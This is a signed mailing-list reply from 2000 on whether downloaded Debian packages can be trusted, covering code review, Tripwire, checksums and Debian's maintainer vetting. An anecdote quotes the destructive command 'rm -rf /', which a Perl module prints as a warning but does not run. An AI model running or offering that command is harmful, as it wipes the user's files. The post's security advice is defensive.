-----BEGIN PGP SIGNED MESSAGE----- On Tue, 22 Aug 2000, hogan wrote:
> I go to this site, download the .deb's .. How can I be sure they're not > malicious. You can't. Period. Same goes for source. Same goes for commercial binaries. Same goes for any code you haven't read (or had someone you thoroughly trust read). To illustrate this point there's a perl module somewhere (don't remember the module or what it does..something to do with Apache/web anyway) that, when you run 'perl Makefile.PL', it runs through some stuff and then spits out something about preparing to do 'rm -rf /'. Naturally it doesn't actually do it, but it follows with a message about the importance of confirming the trustworthiness of *any* code you install on your system. > Or maybe for those who develop homicidal tendancies when asked, "Are you > sure?" :) :) a log of what the program did? (Now I know very little 'bout > Linux - I'm still learning.. Would a journalling FS such as ReiserFS help in > this regard?) Is something like tripwire (that I've read a few little > bits'n'pieces about) what I need to give me a little reassurance that I'm not > completely placing my machine into the hands of a stranger? Tripwire will give you an idea of what files change, so you can be sure that (for example) installing a mail reader is not replacing /bin/login or something like that. That doesn't prevent that same mail reader from mailing off some crucial piece of data or some security info to some cracker database somewhere, though. > I mean I generally get the feeling people around this and other linux related > mailing lists that people really want to help, but I can't help but think that > all of this is placing a lot of trust in people one will never meet and may > indeed never communicate with. In the case of official debian packages (downloaded from the 'main' section of an official Debian mirror (non-free and contrib may not apply, but then they might...I don't know)) you can be reasonably sure that what you see is what you get. Debian has a pretty strict policy regarding becoming an official developer. You're pretty much certain that the package is in fact built from the code it is claimed to have been built from and that the maintainer is who they claim to be. In the case of unofficial packages like the Pine packages on my mirror, you can check Washington university's FTP site for some MD5 checksums or whatever for their code, then read through the diff (much less code than reading all of Pine!) and build your own package from this source to confirm for yourself that Pine is safe. Of course, that's assuming you trust UW. In short, there are no guarantees. At some point you have to take it on faith that somebody honest has read the code that you're installing. Noah _______________________________________________________ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOaF+RodCcpBjGWoFAQH6BQQAtkRaJyorHigOAkmW9cdE8Po6s48FRgrF Uo+GXSpjeCc3EvIn08cP3VWe1WGa1IqDfofnuCZnOu2V2kODUAJimx+DN3sZkK/+ tErtiZjCsup4mUMeCPRkr65KOOQ6EwGuacJombo9rxdsakR8HM6P5Gzzo17gRAvz vFV9OwhjsvM= =IsaP -----END PGP SIGNATURE-----
